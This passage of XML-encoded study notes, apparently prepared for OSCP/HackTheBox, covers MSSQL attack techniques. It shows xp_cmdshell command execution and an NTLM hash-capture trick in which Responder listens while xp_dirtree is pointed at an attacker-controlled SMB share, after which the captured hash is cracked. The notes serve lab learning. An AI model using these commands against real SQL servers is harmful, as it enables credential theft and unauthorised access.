        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In other words, it lets you run Windows commands from a SQL query window.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000198E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1086"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Think of it as a way to use SQL Server like a terminal (cmd.exe) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— extremely powerful, and dangerous if misused.</w:t>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="603"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xp_cmdshell 'whoami'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001991">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="603"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You might need quotes around the command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001992">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="603"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xp_cmdshell whoami</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001993">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="603"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you are using mssqlclient.py to connect, maybe you don't need the EXEC command. But if you do, then do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="603"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXEC xp_cmdshell 'whoami';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001995">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001996">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fg6epcsl8l08" w:id="207"/>
      <w:bookmarkEnd w:id="207"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NTLM hash capture trick (using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mssql </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xp_dirtree and responder)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001997">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001998">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I think a similar Relay attack can be found in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> OSCP 15.3.4. Relaying Net-NTLMv2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001999">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000199A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Escape HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000199B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000199C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a classic </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NTLM hash capture trick </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">used during </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Server exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000199D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000199E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="237"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo responder -I tun0 -v </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000199F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="237"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"-I tun0"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - This tells Responder to listen on the tun0 interface, which is usually the VPN interface on HackTheBox.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="237"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Allowed in OSCP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="237"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is Responder?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="237"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Responder </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is a tool that listens for and captures </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authentication requests </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on the network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="237"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It spoofs services like SMB, HTTP, etc., and waits for systems to connect to it and send NTLM hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="237"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can then crack these hashes offline using tools like hashcat.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="237"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xp_dirtree \\10.10.10.10\fake\share</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="237"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also try </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXEC xp_dirtree '\\10.10.10.10\fake\share' </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">if it doesn't work</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="237"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also try adding quotes around everything after xp_dirtree </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="237"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This would try and list folders inside of the \\10.10.10.10\fake\share share</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="237"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But here's the catch:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="237"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Even if the share doesn't exist…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="237"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Server still tries to authenticate to that path (using SMB) to access it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="237"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This leads to an attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="237"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xp_dirtree?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="237"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xp_dirtree is a SQL Server extended stored procedure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="237"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It lists subdirectories of a specified path.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="237"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can pass it UNC (Universal Naming Convention) paths (like \\IP\share) that point to remote SMB shares.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019B1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019B2">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How they work together:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="980"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo responder -I tun0 -v </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="980"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now their machine (say, 10.10.14.3) is ready to catch NTLM hashes sent over SMB.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="980"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXEC xp_dirtree '\\10.10.10.10\fake\share'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="980"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Server tries to reach that UNC path via SMB — and sends an NTLM authentication request from the SQL Server's Windows account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="980"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Responder </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">intercepts </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">this request and saves the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">net-NTLMv2 hash of the Windows account that the SQL Server service is running as</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="980"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker then uses tools like hashcat to crack the hash and get the password of the SQL Server's Windows account (often a domain user or admin!)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019B9">
